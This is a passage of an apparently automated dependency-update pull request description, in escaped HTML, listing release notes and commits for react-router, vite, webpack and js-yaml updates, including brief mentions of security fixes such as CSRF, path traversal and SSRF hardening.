href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `react-router` from 7.6.3 to 7.12.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/remix-run/react-router/releases\"\u003ereact-router's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.12.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7120\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7120\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.11.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7110\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7110\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.10.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7101\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7101\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.10.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7100\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7100\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.6\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v796\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v796\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.5\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v795\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v795\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.4\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v794\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v794\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.3\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v793\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v793\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.2\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v792\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v792\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v791\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v791\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v790\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v790\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.8.2\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v782\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v782\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.8.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v781\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v781\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.8.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v780\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v780\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.7.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v771\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v771\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.7.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v770\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v770\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/remix-run/react-router/blob/main/packages/react-router/CHANGELOG.md\"\u003ereact-router's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e7.12.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd additional layer of CSRF protection by rejecting submissions to UI routes from external origins. If you need to permit access to specific external origins, you can specify them in the \u003ccode\u003ereact-router.config.ts\u003c/code\u003e config \u003ccode\u003eallowedActionOrigins\u003c/code\u003e field. (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14708\"\u003e#14708\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003egeneratePath\u003c/code\u003e when used with suffixed params (i.e., \u0026quot;/books/:id.json\u0026quot;) (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14269\"\u003e#14269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eExport \u003ccode\u003eUNSAFE_createMemoryHistory\u003c/code\u003e and \u003ccode\u003eUNSAFE_createHashHistory\u003c/code\u003e alongside \u003ccode\u003eUNSAFE_createBrowserHistory\u003c/code\u003e for consistency. These are not intended to be used for new apps but intended to help apps usiong \u003ccode\u003eunstable_HistoryRouter\u003c/code\u003e migrate from v6-\u0026gt;v7 so they can adopt the newer APIs. (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14663\"\u003e#14663\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEscape HTML in scroll restoration keys (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14705\"\u003e#14705\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eValidate redirect locations (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14706\"\u003e#14706\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e[UNSTABLE] Pass \u003ccode\u003e\u0026lt;Scripts nonce\u0026gt;\u003c/code\u003e value through to the underlying \u003ccode\u003eimportmap\u003c/code\u003e \u003ccode\u003escript\u003c/code\u003e tag when using \u003ccode\u003efuture.unstable_subResourceIntegrity\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14675\"\u003e#14675\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e[UNSTABLE] Add a new \u003ccode\u003efuture.unstable_trailingSlashAwareDataRequests\u003c/code\u003e flag to provide consistent behavior of \u003ccode\u003erequest.pathname\u003c/code\u003e inside \u003ccode\u003emiddleware\u003c/code\u003e, \u003ccode\u003eloader\u003c/code\u003e, and \u003ccode\u003eaction\u003c/code\u003e functions on document and data requests when a trailing slash is present in the browser URL. (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14644\"\u003e#14644\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eCurrently, your HTTP and \u003ccode\u003erequest\u003c/code\u003e pathnames would be as follows for \u003ccode\u003e/a/b/c\u003c/code\u003e and \u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/p\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c.data\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c.data\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ⚠️\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cp\u003eWith this flag enabled, these pathnames will be made consistent though a new \u003ccode\u003e_.data\u003c/code\u003e format for client-side \u003ccode\u003e.data\u003c/code\u003e requests:\u003c/p\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c.data\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/_.data\u003c/code\u003e ⬅️\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cp\u003eThis a bug fix but we are putting it behind an opt-in flag because it has the potential to be a \u0026quot;breaking bug fix\u0026quot; if you are relying on the URL format for any other application or caching logic.\u003c/p\u003e\n\u003cp\u003eEnabling this flag also changes the format of client side \u003ccode\u003e.data\u003c/code\u003e requests from \u003ccode\u003e/_root.data\u003c/code\u003e to \u003ccode\u003e/_.data\u003c/code\u003e when navigating to \u003ccode\u003e/\u003c/code\u003e to align with the new format. This does not impact the \u003ccode\u003erequest\u003c/code\u003e pathname which is still \u003ccode\u003e/\u003c/code\u003e in all cases.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePreserve \u003ccode\u003eclientLoader.hydrate=true\u003c/code\u003e when using \u003ccode\u003e\u0026lt;HydratedRouter unstable_instrumentations\u0026gt;\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14674\"\u003e#14674\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/26653a6bcbf8a9c5541f99dcfb526eafadf13434\"\u003e\u003ccode\u003e26653a6\u003c/code\u003e\u003c/a\u003e chore: Update version for release (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14712\"\u003e#14712\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/7ac2346873b4bba26d16c88e5cd5c5cb81ce6bb3\"\u003e\u003ccode\u003e7ac2346\u003c/code\u003e\u003c/a\u003e chore: Update version for release (pre) (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14709\"\u003e#14709\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/75b1ef50867d8fa3d5ffdab28245d5fec307d6a7\"\u003e\u003ccode\u003e75b1ef5\u003c/code\u003e\u003c/a\u003e Add origin checks for UI route submissions (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14708\"\u003e#14708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/c05ef936fd9334f82aafa7e9087b78a8bf5c745d\"\u003e\u003ccode\u003ec05ef93\u003c/code\u003e\u003c/a\u003e Validate redirect locations (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14706\"\u003e#14706\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/c89c32c562a7723c45ee71dab1c892acaf7a608d\"\u003e\u003ccode\u003ec89c32c\u003c/code\u003e\u003c/a\u003e Escape HTML in scroll restoration keys (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14705\"\u003e#14705\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/cbcbf3091b55ef0067724fbd744f31c6d85eb1e6\"\u003e\u003ccode\u003ecbcbf30\u003c/code\u003e\u003c/a\u003e fix: pass nonce to importmap script when using subResourceIntegrity (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14675\"\u003e#14675\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/30f6c1d8142cbd2c26aef57cb2e12a4a8708eb4f\"\u003e\u003ccode\u003e30f6c1d\u003c/code\u003e\u003c/a\u003e fix(react-router): handle parameters with static suffixes in generatePath (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/7f140e098ecd83fd183468e0c0acae86589bfd11\"\u003e\u003ccode\u003e7f140e0\u003c/code\u003e\u003c/a\u003e Handle data requests with trailing slash consistently (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14644\"\u003e#14644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/1954af63742be277162f8d5d054ca07e04a4a401\"\u003e\u003ccode\u003e1954af6\u003c/code\u003e\u003c/a\u003e Preserve hydrate property on client loaders during instrumentation (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14674\"\u003e#14674\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/5ce5cd4ebfc6959bf8d667075cb5b9ae0a9d5476\"\u003e\u003ccode\u003e5ce5cd4\u003c/code\u003e\u003c/a\u003e chore: format\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/remix-run/react-router/commits/react-router@7.12.0/packages/react-router\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for react-router since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.3.1 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.90.0 to 5.104.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level 